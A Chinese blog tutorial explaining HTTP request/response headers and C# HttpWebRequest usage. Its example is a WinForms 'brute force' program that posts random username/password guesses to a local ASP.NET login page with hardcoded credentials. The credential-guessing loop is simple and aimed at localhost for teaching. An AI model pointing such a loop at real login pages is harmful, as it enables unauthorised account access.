我們學習網絡編程最熟悉的莫過於Http,好,我們就從Http入手,首先我們肯定要了解一下http的基本原理和作為,對http的工作原理有
一定程度的掌握,對我們下面的學習都是有很大幫助的。
一: 工作方式
①:client和server建立可靠的TCP連接。
②:然後client通過Socket向server發送http請求。
③:server端處理請求,返回處理數據。
④:在http1.0中,client與server之間的tcp連接立即斷開。
但在http1.1中,因為默認支持“tcp的長連接”,所以server端採用超時才斷開tcp連接的策略。
二: 特點
①:Http是無狀態的,這個相信大家都知道,我就不多說了。
②:client通過在Http請求中的Header裡追加一些信息來告訴Server傳送的主體的相關信息,比如:主體是什麼類型,什麼編碼。
三:Http請求和響應探究
相信大家都知道常用的請求方式也就是"Get"和“Post”,那麼下面就來探究下Get和Post都有哪些好玩的地方,還是上圖說話,首先
我輸入www.baidu.com,會找到如下的請求和響應的信息。
1: “Request Header“:
第一行: Get / Http/1.1
這裡面有三個信息:①"Get",表示請求的模式。 ②“/",請求網站的根目錄。 ③"http/1.1",這個就是http的版本。
第二行: Host
請求目標的網站,跟“/"並一起就是"www.baidu.com/"。
第三行: Connection
默認為“keep-Alive“,這裡就是文章開頭所說的默認支持長連接。
第四行: Cache-Control
這玩意跟緩存有關,其中max-age表示緩存的時間(s)。
第五行:User-Agent
告訴serve我client的身份,一般由瀏覽器決定,比如:瀏覽器類型,版本等等。
第六行:Accept
以及後面的Accept打頭的都是表明client能夠接收的種類和類型。
最後一行:Cookie
如果我們第一次向baidu請求時是沒有cookie信息這一欄的,因為在瀏覽器下找不到於baidu相關的cookie,
當我們第二次刷新頁面時,get請求就會找到本地的cookie並附帶給server。
2: "Response Header":
第一行: Http/1.1 200 OK
這個估計大家都知道吧,200表示返回的狀態碼,OK則是描述性的狀態碼。
第二行:Date
表示服務器響應的時間。
第三行: Server
響應客戶端的服務器。
第四行:Content-Length
表示服務器返回給客戶端正文的字節流長度。
第五行:Content-Type
表示正文的類型。
第七行:Expires
告訴client絕對的過期時間,比如2012.1.10,在這個時間內client都可以不用發送請求而直接從client的cache中獲取,
對js,css,image的緩存很有好處,所以說用好了這個屬性對我們http的性能有很大的幫助。
第八行:Content-Encoding
文檔類型的編碼方式,服務器端採用gzip的形式進行了文檔壓縮,此時減小了文檔,利於下載,但是必須client端支持
gzip的解碼操作。
post的方式也是一樣的,這裡就不說了,上面列舉了這麼多也是希望大家能夠對Http的細節要有一定程度的掌握。
四:應用場景
我們在http上面的網絡編程一般主要做兩件事情。
①:爬數據,模擬登錄,自動填表單。
②:文件的上傳和下載。
不過.net對Http進行了非常好的封裝,提供了HttpWebRequest和HttpWebResponse來給我們提供常用操作,如果大家對Http協議有個比較
清晰的認識我想類庫裡面的屬性和方法都是神馬和浮雲。
五 :案例
既然是上篇,就根據“模擬登錄”的思想做一個簡單的“暴力破解”的小程序,非常簡單,呵呵。
第一步: 首先我們寫兩個action,一個login(登錄頁面),一個index(用戶後臺首頁)。
namespace Test.Controllers { [HandleError] public class HomeController : Controller { public ActionResult Login() { return View(); } [HttpPost] public ActionResult Index(Model model) { if (model.UserName == "11" && model.Password == "11") return View(model); else return RedirectToAction("Login"); } public ActionResult About() { return View(); } } public class Model { public string UserName { get; set; } public string Password { get; set; } } }
好了,我們打開fiddler,輸入admin,admin,點擊提交,看看都post些什麼到server端了,方便我們後面的模擬登錄,
這裡的head信息相信大家還是能看懂吧。
第二步:我們新建一個winform的程序。
namespace Http { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { //網頁內容填充webbrowser1控件 string url = "http://localhost:59773/"; //創建http鏈接 var request = (HttpWebRequest)WebRequest.Create(url); var response = (HttpWebResponse)request.GetResponse(); Stream stream = response.GetResponseStream(); StreamReader sr = new StreamReader(stream); string content = sr.ReadToEnd(); webBrowser1.DocumentText = content; } ////// 暴力破解 /////////private void button1_Click(object sender, EventArgs e) { var url = "http://localhost:59773/Home/Index"; //上一次的返回結果 string prev = string.Empty; for (int i = 0; i < 100; i++) { var username = new Random(DateTime.Now.Millisecond).Next(8, 19).ToString(); Thread.Sleep(2); var password = new Random(DateTime.Now.Millisecond).Next(8, 19).ToString(); //post提交的內容 var content = "username=" + username + "&password=" + password; //將content變為字節形式 var bytes = Encoding.UTF8.GetBytes(content); var request = (HttpWebRequest)WebRequest.Create(url); //根據fiddler中查看到的提交信息,我們也試著模擬追加此類信息然後提交 request.Method = WebRequestMethods.Http.Post; request.Timeout = 1000 * 60; request.AllowAutoRedirect = true; request.ContentLength = bytes.Length; request.ContentType = "application/x-www-form-urlencoded"; //將content寫入post請求中 var stream = request.GetRequestStream(); stream.Write(bytes, 0, bytes.Length); stream.Close(); //寫入成功,獲取請求流 var response = (HttpWebResponse)request.GetResponse(); var sr = new StreamReader(response.GetResponseStream()); var next = sr.ReadToEnd(); if (string.IsNullOrEmpty(prev)) { prev = next; } else { if (prev != next) { webBrowser2.DocumentText = next; MessageBox.Show("恭喜你,密碼已經破解!一共花費:" + (i + 1) + "次,用戶名為:" + username + ",密碼為:" + password); return; } } } webBrowser2.DocumentText = "不好意思,未能破解"; } } }
第三步:我們現在要做的就是點擊”暴力破解”,看看能不能給我枚舉出來“肉雞網站”的用戶名和密碼。
呵呵,現實中遠不止這麼簡單,主要還是想讓大家能夠對HttpWebReqeust和HttpWebResponse有個瞭解。
[retouched ] 深入學習C#網絡編程之HTTP應用編程(上)已經有403次圍觀